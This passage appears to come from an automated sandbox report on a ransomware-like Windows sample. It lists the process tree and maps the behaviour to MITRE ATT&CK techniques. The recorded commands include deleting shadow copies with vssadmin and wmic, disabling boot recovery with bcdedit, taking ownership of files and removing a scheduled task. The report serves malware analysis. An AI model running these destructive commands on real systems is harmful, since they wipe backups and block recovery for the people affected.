C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵PID:856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "background.png" -nobanner3⤵PID:1168
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "background.png" -nobanner4⤵PID:2032
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1440
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {150D8E3D-8B48-4F8E-BE1F-18A821F7217E} S-1-5-21-1131729243-447456001-3632642222-1000:AVGLFESB\Admin:Interactive:[1]1⤵PID:288
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\LVdYYcnh.bat"2⤵PID:860
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:360
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1340
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:1076
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F3⤵PID:688
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1328
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File Deletion
2File and Directory Permissions Modification
1Modify Registry
3